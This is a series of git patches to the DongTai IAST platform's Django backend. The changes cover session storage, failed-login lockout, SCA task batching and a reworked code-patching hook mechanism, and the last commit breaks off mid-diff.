From 11425847d8bf53ecf7edb1a58986c51d2c0fd5d2 Mon Sep 17 00:00:00 2001 From: st1020 Date: Thu, 17 Aug 2023 16:36:06 +0800 Subject: [PATCH 001/114] fix: remove print --- dongtai_conf/patch/__init__.py | 2 -- 1 file changed, 2 deletions(-) diff --git a/dongtai_conf/patch/__init__.py b/dongtai_conf/patch/__init__.py index 57fbcd704..b258f98f3 100644 --- a/dongtai_conf/patch/__init__.py +++ b/dongtai_conf/patch/__init__.py @@ -33,7 +33,6 @@ def init_patch() -> None: if not module_info.name.startswith("_"): importlib.import_module("dongtai_conf.patch." + module_info.name) is_init_patch = True - print(PATCH_HANDLER) T = TypeVar("T") @@ -95,7 +94,6 @@ def patch_point(*args: Any, patch_id: int = 0) -> Any: def _return_args(*args: Unpack[Ts]) -> tuple[Unpack[Ts]] | Any: - print(args) if len(args) == 1: return args[0] return args From c5e72c32d7255ad198c91909857f8079fa7a7c4a Mon Sep 17 00:00:00 2001 From: st1020 Date: Fri, 18 Aug 2023 10:47:25 +0800 Subject: [PATCH 002/114] pref: improve app vul list pref --- dongtai_web/aggr_vul/app_vul_list.py | 2 -- 1 file changed, 2 deletions(-) diff --git a/dongtai_web/aggr_vul/app_vul_list.py b/dongtai_web/aggr_vul/app_vul_list.py index b0f825434..f0ad1d981 100644 --- a/dongtai_web/aggr_vul/app_vul_list.py +++ b/dongtai_web/aggr_vul/app_vul_list.py @@ -104,14 +104,12 @@ def post(self, request): "status_id", "first_time", "latest_time", - "strategy__vul_name", "language", "project__name", "server__container", "project_id", "strategy_id", "project_version_id", - "project_version__version_name", ] if keywords: es_query["search_keyword"] = keywords From e119303e31a22eb9e23c98d3a30e942c27bc5470 Mon Sep 17 00:00:00 2001 From: st1020 Date: Fri, 18 Aug 2023 12:14:07 +0800 Subject: [PATCH 003/114] pref: use group celery tasks in sca bulk handler --- .../report/handler/sca_handler.py | 40 ++++++++++++++++++- 1 file changed, 38 insertions(+), 2 deletions(-) diff --git a/dongtai_protocol/report/handler/sca_handler.py b/dongtai_protocol/report/handler/sca_handler.py index 84ac29a44..0c591a187 100644 --- a/dongtai_protocol/report/handler/sca_handler.py +++ b/dongtai_protocol/report/handler/sca_handler.py @@ -3,6 +3,7 @@ import json import logging +from celery import group from django.utils.translation import gettext_lazy as _ from dongtai_common.utils import const @@ -77,7 +78,7 @@ def save(self): @ReportHandler.register(const.REPORT_SCA + 1) -class ScaBulkHandler(ScaHandler): +class ScaBulkHandler(IReportHandler): def parse(self): self.packages = self.detail.get("packages") self.package_path = self.detail.get("packagePath") @@ -87,10 +88,45 @@ def parse(self): self.package_version = self.detail.get("packageVersion", "") def save(self): + task_group = [] for package in self.packages: self.package_path = package.get("packagePath", None) self.package_signature = package.get("packageSignature", None) self.package_name = package.get("packageName", None) self.package_algorithm = package.get("packageAlgorithm", None) self.package_version = package.get("packageVersion", "") - super().save() + + try: + logger.info( + f"[+] 处理SCA请求[{self.agent_id}, {self.package_path}, {self.package_signature}, {self.package_name}, {self.package_algorithm} {self.package_version}]正在下发扫描任务" + ) + if self.package_signature: + task_group.append( + new_update_one_sca.s( + self.agent_id, + self.package_path, + self.package_signature, + self.package_name, + self.package_algorithm, + self.package_version, + ) + ) + else: + task_group.append( + update_one_sca.s( + self.agent_id, + self.package_path, + self.package_signature, + self.package_name, + self.package_algorithm, + self.package_version, + ) + ) + logger.info( + f"[+] 处理SCA请求[{self.agent_id}, {self.package_path}, {self.package_signature}, {self.package_name}, {self.package_algorithm} {self.package_version}]任务下发完成" + ) + except Exception as e: + logger.info( + f"[-] Failure: sca package [{self.agent_id} {self.package_path} {self.package_signature} {self.package_name} {self.package_algorithm} {self.package_version}], Error: {e}" + ) + group(*task_group).delay() From aeaa94bef81e6549b4af3401c64bd7df54dbfe13 Mon Sep 17 00:00:00 2001 From: st1020 Date: Mon, 21 Aug 2023 17:14:51 +0800 Subject: [PATCH 004/114] feat: add session engine --- dongtai_common/migrations/0012_session.py | 40 +++++++++++++++++++++++ dongtai_common/models/__init__.py | 21 +++++++----- dongtai_common/utils/db_session_engine.py | 36 ++++++++++++++++++++ dongtai_conf/settings.py | 1 + 4 files changed, 89 insertions(+), 9 deletions(-) create mode 100644 dongtai_common/migrations/0012_session.py create mode 100644 dongtai_common/utils/db_session_engine.py diff --git a/dongtai_common/migrations/0012_session.py b/dongtai_common/migrations/0012_session.py new file mode 100644 index 000000000..552ec17ae --- /dev/null +++ b/dongtai_common/migrations/0012_session.py @@ -0,0 +1,40 @@ +# Generated by Django 3.2.20 on 2023-08-21 17:06 + +import django.db.models.deletion +from django.conf import settings +from django.db import migrations, models + + +class Migration(migrations.Migration): + dependencies = [ + ("dongtai_common", "0011_auto_20230814_1537"), + ] + + operations = [ + migrations.CreateModel( + name="Session", + fields=[ + ( + "session_key", + models.CharField(max_length=40, primary_key=True, serialize=False, verbose_name="session key"), + ), + ("session_data", models.TextField(verbose_name="session data")), + ("expire_date", models.DateTimeField(db_index=True, verbose_name="expire date")), + ( + "user", + models.ForeignKey( + db_constraint=False, + null=True, + on_delete=django.db.models.deletion.DO_NOTHING, + to=settings.AUTH_USER_MODEL, + ), + ), + ], + options={ + "verbose_name": "session", + "verbose_name_plural": "sessions", + "db_table": "iast_session", + "abstract": False, + }, + ), + ] diff --git a/dongtai_common/models/__init__.py b/dongtai_common/models/__init__.py index 44e3d43fc..1f1f8eef1 100644 --- a/dongtai_common/models/__init__.py +++ b/dongtai_common/models/__init__.py @@ -1,15 +1,18 @@ #!/usr/bin/env python # datetime:2021/1/25 下午6:43 -from .user import User # noqa: I001, F401 -from . import api_route # noqa: F401 -from .project_group import IastProjectGroup # noqa: F401 -from .project_metadata import IastProjectMetaData # noqa: F401 -from .api_route_v2 import * # noqa: F403 -from .integration import * # noqa: F403 -from .license import * # noqa: F403 -from .request_chains import * # noqa: F403 -from .share_token import * # noqa: F403 +# ruff: noqa: I001, F401, F403 + +from .user import User +from . import api_route +from .project_group import IastProjectGroup +from .project_metadata import IastProjectMetaData +from .api_route_v2 import * +from .integration import * +from .license import * +from .request_chains import * +from .share_token import * +from dongtai_common.utils.db_session_engine import Session LANGUAGE_DICT = {"JAVA": 1, "PYTHON": 2, "PHP": 3, "GO": 4} diff --git a/dongtai_common/utils/db_session_engine.py b/dongtai_common/utils/db_session_engine.py new file mode 100644 index 000000000..1982a13bc --- /dev/null +++ b/dongtai_common/utils/db_session_engine.py @@ -0,0 +1,36 @@ +from django.contrib.auth import SESSION_KEY +from django.contrib.sessions.backends.db import SessionStore as DBSessionStore +from django.contrib.sessions.base_session import AbstractBaseSession +from django.db import models + +from dongtai_common.models.user import User + + +class Session(AbstractBaseSession): + user = models.ForeignKey(User, models.DO_NOTHING, null=True, db_constraint=False) + + @classmethod + def get_session_store_class(cls): + return SessionStore + + class Meta(AbstractBaseSession.Meta): + db_table = "iast_session" + + +class SessionStore(DBSessionStore): + @classmethod + def get_model_class(cls): + return Session + + def create_model_instance(self, data): + """ + Return a new instance of the session model object, which represents the + current session state. Intended to be used for saving the session data + to the database. + """ + return self.model( + user_id=self.get(SESSION_KEY), + session_key=self._get_or_create_session_key(), # type: ignore + session_data=self.encode(data), + expire_date=self.get_expiry_date(), + ) diff --git a/dongtai_conf/settings.py b/dongtai_conf/settings.py index 63c65efe4..837aed996 100644 --- a/dongtai_conf/settings.py +++ b/dongtai_conf/settings.py @@ -482,6 +482,7 @@ def safe_execute(default, exception, function, *args): ENABLE_SSL = config.get("smtp", "ssl") == "True" ADMIN_EMAIL = config.get("smtp", "cc_addr") SESSION_COOKIE_DOMAIN = None +SESSION_ENGINE = "dongtai_common.utils.db_session_engine" CSRF_COOKIE_DOMAIN = None SECURE_BROWSER_XSS_FILTER = True From c0791da50df5983a0454c929304def82cbf4c595 Mon Sep 17 00:00:00 2001 From: st1020 Date: Mon, 21 Aug 2023 18:34:14 +0800 Subject: [PATCH 005/114] feat: remove outdate code --- dongtai_common/endpoint/__init__.py | 17 ----------------- 1 file changed, 17 deletions(-) diff --git a/dongtai_common/endpoint/__init__.py b/dongtai_common/endpoint/__init__.py index 217b14cf9..201433744 100644 --- a/dongtai_common/endpoint/__init__.py +++ b/dongtai_common/endpoint/__init__.py @@ -96,23 +96,6 @@ def dispatch(self, request, *args, **kwargs): self.request = request self.headers = self.default_response_headers # deprecate? - is_protocol_api = False - try: - if self.request.method is not None: - _path, _path_regex, _schema, filepath = VIEW_CLASS_TO_SCHEMA[self.__class__][self.request.method] - is_protocol_api = "dongtai_protocol" in filepath - except Exception: - pass - - if not is_protocol_api and not request.user.is_active and not request.user.is_anonymous: - logout(request) - request.session.delete() - response = R.failure(msg="用户已经禁用", status_code=403) - request.session.delete() - response.delete_cookie(key=settings.CSRF_COOKIE_NAME, domain=settings.SESSION_COOKIE_DOMAIN) - response.delete_cookie(key="sessionid", domain=settings.SESSION_COOKIE_DOMAIN) - return response - try: self.initial(request, *args, **kwargs) From ea35c2bb9e2d4ab5a93ecaf33d08f4d383e434c2 Mon Sep 17 00:00:00 2001 From: st1020 Date: Mon, 21 Aug 2023 18:43:43 +0800 Subject: [PATCH 006/114] feat: remove outdate code --- dongtai_common/endpoint/__init__.py | 2 -- 1 file changed, 2 deletions(-) diff --git a/dongtai_common/endpoint/__init__.py b/dongtai_common/endpoint/__init__.py index 201433744..b02d3b4fc 100644 --- a/dongtai_common/endpoint/__init__.py +++ b/dongtai_common/endpoint/__init__.py @@ -6,7 +6,6 @@ from operator import ior from typing import TYPE_CHECKING -from django.contrib.auth import logout from django.core.paginator import EmptyPage, Paginator from django.db.models import Count from django.http import JsonResponse @@ -31,7 +30,6 @@ ) from dongtai_common.utils import const from dongtai_common.utils.init_schema import VIEW_CLASS_TO_SCHEMA -from dongtai_conf import settings if TYPE_CHECKING: from django.core.paginator import _SupportsPagination From 4d2513a77b2af580f519640801b7c061041b0784 Mon Sep 17 00:00:00 2001 From: st1020 Date: Tue, 22 Aug 2023 10:50:25 +0800 Subject: [PATCH 007/114] feat: set session expiry --- dongtai_web/views/user_login.py | 17 ++++++++++++++++- 1 file changed, 16 insertions(+), 1 deletion(-) diff --git a/dongtai_web/views/user_login.py b/dongtai_web/views/user_login.py index 694b5d953..c750ea526 100644 --- a/dongtai_web/views/user_login.py +++ b/dongtai_web/views/user_login.py @@ -1,18 +1,32 @@ #!/usr/local/env python +import json import logging import time from captcha.models import CaptchaStore +from django.conf import settings from django.contrib.auth import authenticate, login from django.utils.translation import gettext_lazy as _ from drf_spectacular.utils import extend_schema from dongtai_common.endpoint import R, UserEndPoint +from dongtai_common.models.profile import IastProfile from dongtai_common.models.user import User +from dongtai_common.utils.request_type import Request logger = logging.getLogger("dongtai-webapi") +SESSION_EXPIRY_PROFILE_KEY = "session_expiry" + + +def get_session_expiry() -> int: + profile = IastProfile.objects.filter(key=SESSION_EXPIRY_PROFILE_KEY).values_list("value", flat=True).first() + if profile is None: + return settings["SESSION_COOKIE_AGE"] + return json.loads(profile)[SESSION_EXPIRY_PROFILE_KEY] + + class UserLogin(UserEndPoint): permission_classes = [] authentication_classes = [] @@ -23,7 +37,7 @@ class UserLogin(UserEndPoint): summary=_("User login"), tags=[_("User")], ) - def post(self, request): + def post(self, request: Request): """{ 'username': "", 'password': "", @@ -44,6 +58,7 @@ def post(self, request): user = authenticate(username=username, password=password) if user is not None: login(request, user) + request.session.set_expiry(get_session_expiry()) return R.success( msg=_("Login successful"), data={ From a359d73e7130669dc3545e71b397bcb9e66d79b5 Mon Sep 17 00:00:00 2001 From: st1020 Date: Tue, 22 Aug 2023 11:59:36 +0800 Subject: [PATCH 008/114] fix: app vul list error --- dongtai_web/aggr_vul/app_vul_list.py | 2 ++ 1 file changed, 2 insertions(+) diff --git a/dongtai_web/aggr_vul/app_vul_list.py b/dongtai_web/aggr_vul/app_vul_list.py index f0ad1d981..b0f825434 100644 --- a/dongtai_web/aggr_vul/app_vul_list.py +++ b/dongtai_web/aggr_vul/app_vul_list.py @@ -104,12 +104,14 @@ def post(self, request): "status_id", "first_time", "latest_time", + "strategy__vul_name", "language", "project__name", "server__container", "project_id", "strategy_id", "project_version_id", + "project_version__version_name", ] if keywords: es_query["search_keyword"] = keywords From 70236c93079f7f7a50c42aa1d304c50dff08cd1e Mon Sep 17 00:00:00 2001 From: st1020 Date: Tue, 22 Aug 2023 14:26:57 +0800 Subject: [PATCH 009/114] feat: add failed login count --- .../management/commands/unlock_user.py | 16 +++++++++++++ .../migrations/0013_auto_20230822_1202.py | 23 +++++++++++++++++++ dongtai_common/models/user.py | 3 +++ dongtai_web/views/user_login.py | 23 +++++++++++++++++-- 4 files changed, 63 insertions(+), 2 deletions(-) create mode 100644 deploy/commands/management/commands/unlock_user.py create mode 100644 dongtai_common/migrations/0013_auto_20230822_1202.py diff --git a/deploy/commands/management/commands/unlock_user.py b/deploy/commands/management/commands/unlock_user.py new file mode 100644 index 000000000..c00ea6c5a --- /dev/null +++ b/deploy/commands/management/commands/unlock_user.py @@ -0,0 +1,16 @@ +from django.core.management.base import BaseCommand + +from dongtai_common.models.user import User + + +class Command(BaseCommand): + help = "scripts to unlock user" + functions = [] + + def add_arguments(self, parser): + parser.add_argument("id", nargs="*", default=[], type=int) + + def handle(self, *args, **options): + users = User.objects.filter(pk__in=options["id"]).all() if options["id"] else User.objects.all() + users.update(failed_login_count=0) + self.stdout.write(self.style.SUCCESS("Successfully Unlock Users")) diff --git a/dongtai_common/migrations/0013_auto_20230822_1202.py b/dongtai_common/migrations/0013_auto_20230822_1202.py new file mode 100644 index 000000000..59114450d --- /dev/null +++ b/dongtai_common/migrations/0013_auto_20230822_1202.py @@ -0,0 +1,23 @@ +# Generated by Django 3.2.20 on 2023-08-22 12:02 + +import django.utils.timezone +from django.db import migrations, models + + +class Migration(migrations.Migration): + dependencies = [ + ("dongtai_common", "0012_session"), + ] + + operations = [ + migrations.AddField( + model_name="user", + name="failed_login_count", + field=models.IntegerField(default=0), + ), + migrations.AddField( + model_name="user", + name="failed_login_time", + field=models.DateTimeField(default=django.utils.timezone.now), + ), + ] diff --git a/dongtai_common/models/user.py b/dongtai_common/models/user.py index 53eb32e3b..c79262db4 100644 --- a/dongtai_common/models/user.py +++ b/dongtai_common/models/user.py @@ -4,6 +4,7 @@ from django.contrib.auth.models import AbstractUser, UserManager from django.db import models from django.db.models import Q, QuerySet +from django.utils import timezone from django.utils.translation import gettext_lazy as _ from dongtai_common.models.department import Department @@ -65,6 +66,8 @@ class User(AbstractUser, PermissionsMixin): role = models.ForeignKey(IastRoleV2, models.DO_NOTHING, default=1, db_constraint=False) is_global_permission = models.BooleanField(default=False) deleted = models.BooleanField(default=False) + failed_login_count = models.IntegerField(default=0) + failed_login_time = models.DateTimeField(default=timezone.now) objects = SaaSUserManager() using_department = None diff --git a/dongtai_web/views/user_login.py b/dongtai_web/views/user_login.py index 694b5d953..6f1b9a361 100644 --- a/dongtai_web/views/user_login.py +++ b/dongtai_web/views/user_login.py @@ -1,9 +1,11 @@ #!/usr/local/env python import logging import time +from datetime import timedelta from captcha.models import CaptchaStore from django.contrib.auth import authenticate, login +from django.utils import timezone from django.utils.translation import gettext_lazy as _ from drf_spectacular.utils import extend_schema @@ -41,8 +43,20 @@ def post(self, request): if captcha_obj.response == captcha.lower(): username = request.data["username"] password = request.data["password"] - user = authenticate(username=username, password=password) + user: User | None = authenticate(username=username, password=password) # type: ignore if user is not None: + current_time = timezone.now() + delta = current_time - user.failed_login_time + if ( + (user.failed_login_count == 6 and delta < timedelta(minutes=1)) + or (user.failed_login_count == 7 and delta < timedelta(minutes=5)) + or (user.failed_login_count == 8 and delta < timedelta(minutes=15)) + or (user.failed_login_count == 9 and delta < timedelta(minutes=60)) + or user.failed_login_count >= 10 + ): + return R.failure(msg="账号已被锁定") + user.failed_login_count = 0 + user.save() login(request, user) return R.success( msg=_("Login successful"), @@ -51,7 +65,7 @@ def post(self, request): "is_active": user.is_active, }, ) - user_login = User.objects.filter(username=username).first() + user_login: User | None = User.objects.filter(username=username).first() if user_login and not user_login.is_active: return R.failure( status=205, @@ -61,6 +75,11 @@ def post(self, request): "is_active": user_login.is_active, }, ) + if user_login is not None: + user_login.failed_login_count += 1 + user_login.failed_login_time = timezone.now() + user_login.save() + return R.failure(msg="密码错误") logger.warn( f"user [{username}] login failure, rease: {'user not exist' if user is None else 'user is disable'}" ) From 01e3e9949952a775e944e3f65c5a4f4da915cc7a Mon Sep 17 00:00:00 2001 From: st1020 Date: Thu, 24 Aug 2023 12:32:02 +0800 Subject: [PATCH 010/114] feat: new patch implementation --- dongtai_common/models/user.py | 3 +- dongtai_common/permissions/__init__.py | 3 +- dongtai_conf/patch/__init__.py | 89 ++++++++++-------------- dongtai_protocol/views/agent_configv2.py | 3 +- dongtai_web/aggr_vul/app_vul_list.py | 3 +- dongtai_web/aggr_vul/app_vul_summary.py | 8 ++- 6 files changed, 49 insertions(+), 60 deletions(-) diff --git a/dongtai_common/models/user.py b/dongtai_common/models/user.py index c79262db4..30cf92f27 100644 --- a/dongtai_common/models/user.py +++ b/dongtai_common/models/user.py @@ -9,7 +9,7 @@ from dongtai_common.models.department import Department from dongtai_common.models.iast_role import IastRoleV2 -from dongtai_conf.patch import patch_point +from dongtai_conf.patch import patch_point, to_patch class PermissionsMixin(models.Model): @@ -120,6 +120,7 @@ def get_using_department(self): return self.using_department return self.get_department() + @to_patch def get_projects(self) -> QuerySet: from dongtai_common.models.project import IastProject diff --git a/dongtai_common/permissions/__init__.py b/dongtai_common/permissions/__init__.py index 8646fe53e..cdb5c2bb5 100644 --- a/dongtai_common/permissions/__init__.py +++ b/dongtai_common/permissions/__init__.py @@ -3,7 +3,7 @@ from rest_framework import permissions -from dongtai_conf.patch import patch_point +from dongtai_conf.patch import patch_point, to_patch class ScopedPermission(permissions.BasePermission): @@ -44,6 +44,7 @@ class UserPermission(ScopedPermission): 用户权限验证类,验证是否为有效用户 """ + @to_patch def has_permission(self, request, view): user = request.user from dongtai_common.endpoint import OpenApiEndPoint diff --git a/dongtai_conf/patch/__init__.py b/dongtai_conf/patch/__init__.py index b258f98f3..519191173 100644 --- a/dongtai_conf/patch/__init__.py +++ b/dongtai_conf/patch/__init__.py @@ -1,12 +1,11 @@ import importlib -import inspect import logging import pkgutil from collections import defaultdict from collections.abc import Callable -from dataclasses import dataclass +from contextvars import ContextVar +from functools import wraps from pathlib import Path -from types import CodeType from typing import Any, TypeVar, overload from typing_extensions import TypeVarTuple, Unpack @@ -16,13 +15,11 @@ logger = logging.getLogger("patch") -@dataclass -class PatchConfig: - type_check: bool - - is_init_patch = False -PATCH_HANDLER: dict[CodeType, dict[int, tuple[Callable, PatchConfig]]] = defaultdict(dict) +PATCH_HANDLER: dict[Callable[..., Any], dict[int, Callable[..., Any]]] = defaultdict(dict) + +context_func: ContextVar[Callable[..., Any] | None] = ContextVar("context_func", default=None) +context_count: ContextVar[int] = ContextVar("context_count", default=0) def init_patch() -> None: @@ -40,45 +37,22 @@ def init_patch() -> None: @overload -def patch_point(*args: Unpack[tuple[T]], patch_id: int = 0) -> T: +def patch_point(*args: Unpack[tuple[T]]) -> T: ... @overload -def patch_point(*args: Unpack[Ts], patch_id: int = 0) -> tuple[Unpack[Ts]]: +def patch_point(*args: Unpack[Ts]) -> tuple[Unpack[Ts]]: ... -def patch_point(*args: Any, patch_id: int = 0) -> Any: - init_patch() - current_frame = inspect.currentframe() - if current_frame is None: - logger.error("current frame is None, can not patch") - return _return_args(*args) - caller_frame = current_frame.f_back - if caller_frame is None: - logger.error("caller frame is None, can not patch") - return _return_args(*args) - caller_code = caller_frame.f_code - if caller_code in PATCH_HANDLER: - func, patch_config = PATCH_HANDLER[caller_code][patch_id] - func_args, _, _, _, kwonlyargs, _, annotations = inspect.getfullargspec(func) - func_args += kwonlyargs - - patch_func_args = {} - for name in func_args: - if name in caller_frame.f_locals: - local_value = caller_frame.f_locals[name] - if patch_config.type_check: - # 如果启用类型检查,进行类型检查 - type_ = annotations.get(name, None) - if type(type_) is type and not isinstance(local_value, type_): - logger.error(f"type check error, name {name}, expect {type_}, get{type(local_value)}") - patch_func_args[name] = local_value - else: - logger.error(f"can not call patch function, miss local var {name}") - return _return_args(*args) - return_value = func(**patch_func_args) +def patch_point(*args: Any) -> Any: + patch_func = context_func.get() + patch_id = context_count.get() + context_count.set(patch_id + 1) + if patch_func in PATCH_HANDLER: + func = PATCH_HANDLER[patch_func][patch_id] + return_value = func(*args) if return_value is None: return _return_args(*args) if len(args) == 1: @@ -99,19 +73,28 @@ def _return_args(*args: Unpack[Ts]) -> tuple[Unpack[Ts]] | Any: return args -def patch(patch_func: Callable, type_check: bool = False, patch_id: int = 0): - def wrapper(func: Callable): - PATCH_HANDLER[patch_func.__code__][patch_id] = ( - func, - PatchConfig(type_check=type_check), - ) - return func +def to_patch(to_patch_func: Callable[..., Any]): + @wraps(to_patch_func) + def wrapper(*args: Any, **kwargs: Any): + token_func = context_func.set(to_patch_func) + token_count = context_count.set(0) + try: + to_patch_func(*args, **kwargs) + finally: + context_func.reset(token_func) + context_count.reset(token_count) + wrapper.to_patch_func = to_patch_func # type: ignore return wrapper -def check_patch() -> None: - for code, func in PATCH_HANDLER.items(): - args, _, _, _, kwonlyargs, _, _ = inspect.getfullargspec(func) - if not set(args + kwonlyargs).issubset(set(code.co_varnames)): - logger.error(f"error: expect args {args + kwonlyargs}, varnames {code.co_varnames}") +def patch(patch_func: Callable[..., Any], patch_id: int = 0): + def wrapper(func: Callable[..., Any]): + to_patch_func = getattr(patch_func, "to_patch_func", None) + if to_patch_func is None: + logger.error(f"to patch function {patch_func} must be decorated by @to_patch") + else: + PATCH_HANDLER[to_patch_func][patch_id] = func + return func + + return wrapper diff --git a/dongtai_protocol/views/agent_configv2.py b/dongtai_protocol/views/agent_configv2.py index b593c589a..8ac159e66 100644 --- a/dongtai_protocol/views/agent_configv2.py +++ b/dongtai_protocol/views/agent_configv2.py @@ -8,7 +8,7 @@ from dongtai_common.endpoint import OpenApiEndPoint, R from dongtai_common.models.agent import IastAgent from dongtai_common.models.profile import IastProfile -from dongtai_conf.patch import patch_point +from dongtai_conf.patch import patch_point, to_patch from dongtai_web.utils import extend_schema_with_envcheck @@ -38,6 +38,7 @@ class AgentConfigAllinOneView(OpenApiEndPoint): tags=["Agent服务端交互协议"], methods=["GET"], ) + @to_patch def get(self, request): ser = _AgentConfigArgsSerializer(data=request.GET) try: diff --git a/dongtai_web/aggr_vul/app_vul_list.py b/dongtai_web/aggr_vul/app_vul_list.py index b0f825434..e5cc70fc8 100644 --- a/dongtai_web/aggr_vul/app_vul_list.py +++ b/dongtai_web/aggr_vul/app_vul_list.py @@ -22,7 +22,7 @@ from dongtai_common.utils.const import OPERATE_GET from dongtai_common.utils.db import SearchLanguageMode from dongtai_conf import settings -from dongtai_conf.patch import patch_point +from dongtai_conf.patch import patch_point, to_patch from dongtai_conf.settings import ELASTICSEARCH_STATE from dongtai_engine.elatic_search.data_correction import data_correction_interpetor from dongtai_web.aggregation.aggregation_common import turnIntListOfStr @@ -39,6 +39,7 @@ class GetAppVulsList(UserEndPoint): tags=[_("Vulnerability"), OPERATE_GET], summary="应用漏洞列表", ) + @to_patch def post(self, request): """ :param request: diff --git a/dongtai_web/aggr_vul/app_vul_summary.py b/dongtai_web/aggr_vul/app_vul_summary.py index 6e475120a..fb8420009 100644 --- a/dongtai_web/aggr_vul/app_vul_summary.py +++ b/dongtai_web/aggr_vul/app_vul_summary.py @@ -9,7 +9,7 @@ from dongtai_common.models.project import IastProject from dongtai_common.models.vulnerablity import IastVulnerabilityModel from dongtai_common.utils.const import OPERATE_GET -from dongtai_conf.patch import patch_point +from dongtai_conf.patch import patch_point, to_patch from dongtai_conf.settings import ELASTICSEARCH_STATE from dongtai_web.serializers.aggregation import AggregationArgsSerializer from dongtai_web.utils import dict_transfrom, extend_schema_with_envcheck @@ -25,6 +25,7 @@ def get_annotate_cache_data(projects: QuerySet[IastProject]): return get_annotate_data(projects, 0, 0) +@to_patch def get_annotate_data(projects: QuerySet[IastProject], bind_project_id: int, project_version_id: int) -> dict: cache_q = Q(is_del=0, project_id__gt=0, project__in=projects) @@ -123,6 +124,7 @@ def post(self, request): ) +@to_patch def get_annotate_data_es(projects: QuerySet[IastProject], bind_project_id: int, project_version_id: int): from elasticsearch import Elasticsearch from elasticsearch_dsl import A, Q @@ -154,7 +156,7 @@ def get_annotate_data_es(projects: QuerySet[IastProject], bind_project_id: int, "strategy": A("terms", field="strategy_id", size=2147483647), "status": A("terms", field="status_id", size=2147483647), } - buckets = patch_point(buckets, patch_id=0) + buckets = patch_point(buckets) for k, v in buckets.items(): search.aggs.bucket(k, v) from dongtai_conf import settings @@ -189,6 +191,6 @@ def get_annotate_data_es(projects: QuerySet[IastProject], bind_project_id: int, for i in origin_buckets: i["name"] = level_dic[i["id"]]["name_value"] origin_buckets = sorted(origin_buckets, key=lambda x: x["id"]) - key, origin_buckets = patch_point(key, origin_buckets, patch_id=1) + key, origin_buckets = patch_point(key, origin_buckets) dic[key] = list(origin_buckets) return dict(dic) From 6915411e2525c8ed250b67bb5665a9e716f41a83 Mon Sep 17 00:00:00 2001 From: tscuite Date: Thu, 24 Aug 2023 14:27:02 +0800 Subject: [PATCH 011/114] feat: update ci --- deploy/kubernetes/helm/templates/_helpers.tpl | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/deploy/kubernetes/helm/templates/_helpers.tpl b/deploy/kubernetes/helm/templates/_helpers.tpl index ab1232419..1fd9f709e 100644 --- a/deploy/kubernetes/helm/templates/_helpers.tpl +++ b/deploy/kubernetes/helm/templates/_helpers.tpl @@ -150,7 +150,7 @@ initContainers: {{- define "deploy.initContainers" -}} initContainers: - - image: {{ .Values.images }}/dongtai-logrotate:{{ .Values.tag }} + - image: {{ .Values.images }}/dongtai-server:{{ .Values.tag }} command: - sh - -c From 38ade47693386955dc6df8a527c1f25f624e3b21 Mon Sep 17 00:00:00 2001 From: st1020 Date: Thu, 24 Aug 2023 14:29:04 +0800 Subject: [PATCH 012/114] fix: login error --- dongtai_web/views/user_login.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dongtai_web/views/user_login.py b/dongtai_web/views/user_login.py index 5f17a9aff..1210cf7fd 100644 --- a/dongtai_web/views/user_login.py +++ b/dongtai_web/views/user_login.py @@ -25,7 +25,7 @@ def get_session_expiry() -> int: profile = IastProfile.objects.filter(key=SESSION_EXPIRY_PROFILE_KEY).values_list("value", flat=True).first() if profile is None: - return settings["SESSION_COOKIE_AGE"] + return settings.SESSION_COOKIE_AGE return json.loads(profile)[SESSION_EXPIRY_PROFILE_KEY] From 7d1bf4f82349ea3fe9a7ca0412268bd649cb041a Mon Sep 17 00:00:00 2001 From: st1020 Date: Thu, 24 Aug 2023 15:10:11 +0800 Subject: [PATCH 013/114] fix: login error --- dongtai_common/utils/db_session_engine.py | 12 ++++++++++++ dongtai_web/views/user_login.py | 14 -------------- 2 files changed, 12 insertions(+), 14 deletions(-) diff --git a/dongtai_common/utils/db_session_engine.py b/dongtai_common/utils/db_session_engine.py index 1982a13bc..365045b5c 100644 --- a/dongtai_common/utils/db_session_engine.py +++ b/dongtai_common/utils/db_session_engine.py @@ -1,10 +1,16 @@ +import json + +from django.conf import settings from django.contrib.auth import SESSION_KEY from django.contrib.sessions.backends.db import SessionStore as DBSessionStore from django.contrib.sessions.base_session import AbstractBaseSession from django.db import models +from dongtai_common.models.profile import IastProfile from dongtai_common.models.user import User +SESSION_EXPIRY_PROFILE_KEY = "session_expiry" + class Session(AbstractBaseSession): user = models.ForeignKey(User, models.DO_NOTHING, null=True, db_constraint=False) @@ -34,3 +40,9 @@ def create_model_instance(self, data): session_data=self.encode(data), expire_date=self.get_expiry_date(), ) + + def get_session_cookie_age(self): + profile = IastProfile.objects.filter(key=SESSION_EXPIRY_PROFILE_KEY).values_list("value", flat=True).first() + if profile is None: + return settings.SESSION_COOKIE_AGE + return json.loads(profile)[SESSION_EXPIRY_PROFILE_KEY] diff --git a/dongtai_web/views/user_login.py b/dongtai_web/views/user_login.py index 1210cf7fd..3778d0dc6 100644 --- a/dongtai_web/views/user_login.py +++ b/dongtai_web/views/user_login.py @@ -1,34 +1,21 @@ #!/usr/local/env python -import json import logging import time from datetime import timedelta from captcha.models import CaptchaStore -from django.conf import settings from django.contrib.auth import authenticate, login from django.utils import timezone from django.utils.translation import gettext_lazy as _ from drf_spectacular.utils import extend_schema from dongtai_common.endpoint import R, UserEndPoint -from dongtai_common.models.profile import IastProfile from dongtai_common.models.user import User from dongtai_common.utils.request_type import Request logger = logging.getLogger("dongtai-webapi") -SESSION_EXPIRY_PROFILE_KEY = "session_expiry" - - -def get_session_expiry() -> int: - profile = IastProfile.objects.filter(key=SESSION_EXPIRY_PROFILE_KEY).values_list("value", flat=True).first() - if profile is None: - return settings.SESSION_COOKIE_AGE - return json.loads(profile)[SESSION_EXPIRY_PROFILE_KEY] - - class UserLogin(UserEndPoint): permission_classes = [] authentication_classes = [] @@ -72,7 +59,6 @@ def post(self, request: Request): user.failed_login_count = 0 user.save() login(request, user) - request.session.set_expiry(get_session_expiry()) return R.success( msg=_("Login successful"), data={ From 5b7aaf45b41e3ce469686069b56d34c2fe1bcf16 Mon Sep 17 00:00:00 2001 From: st1020 Date: Thu, 24 Aug 2023 15:23:44 +0800 Subject: [PATCH 014/114] feat: new patch implementation --- dongtai_conf/patch/__init__.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dongtai_conf/patch/__init__.py b/dongtai_conf/patch/__init__.py index 519191173..e470ce348 100644 --- a/dongtai_conf/patch/__init__.py +++ b/dongtai_conf/patch/__init__.py @@ 